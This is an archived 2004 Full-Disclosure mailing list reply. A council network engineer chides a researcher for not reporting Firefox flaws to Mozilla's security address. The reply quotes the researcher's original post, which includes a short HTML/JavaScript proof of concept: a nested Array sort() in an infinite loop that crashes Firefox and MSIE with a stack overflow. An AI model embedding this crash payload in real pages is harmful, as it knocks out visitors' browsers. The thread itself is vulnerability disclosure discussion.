lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <86144ED6CE5B004DA23E1EAC0B569B5801F77258@isabella.herefordshire.gov.uk> Date: Thu, 25 Nov 2004 09:49:32 -0000 From: "Randal, Phil" <prandal@...efordshire.gov.uk> To: Berend-Jan Wever <skylined@...p.tudelft.nl>, full-disclosure@...ts.netsys.com, vuln-dev@...urityfocus.com, bugtraq@...urityfocus.com Subject: RE: FIREFOX flaws: nested array sort() loop Sta ck overflow exception An email to security@...illa.org would have sufficed. That email address can be found at http://www.mozilla.org/security/bug-bounty.html Phil ---- Phil Randal Network Engineer Herefordshire Council Hereford, UK > -----Original Message----- > From: full-disclosure-admin@...ts.netsys.com > [mailto:full-disclosure-admin@...ts.netsys.com] On Behalf Of > Berend-Jan Wever > Sent: 25 November 2004 01:05 > To: full-disclosure@...ts.netsys.com; > vuln-dev@...urityfocus.com; bugtraq@...urityfocus.com > Subject: [Full-Disclosure] FIREFOX flaws: nested array sort() > loop Stack overflow exception > > Hi all, > > Same flaw works for Firefox as well as MSIE: > > <HTML> > <SCRIPT> a = new Array(); while (1) { (a = new > Array(a)).sort(); } </SCRIPT> > <SCRIPT> a = new Array(); while (1) { (a = new > Array(a)).sort(); } </SCRIPT> </HTML> > > Added to the list: > http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html > > I'd have loved to CC mozilla about this, but I didn't have > the time to do the crash course "how to write a bug report" > and go through all that bugzilla crap. > > Cheers, > SkyLined > http://www.edup.tudelft.nl/~bjwever > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists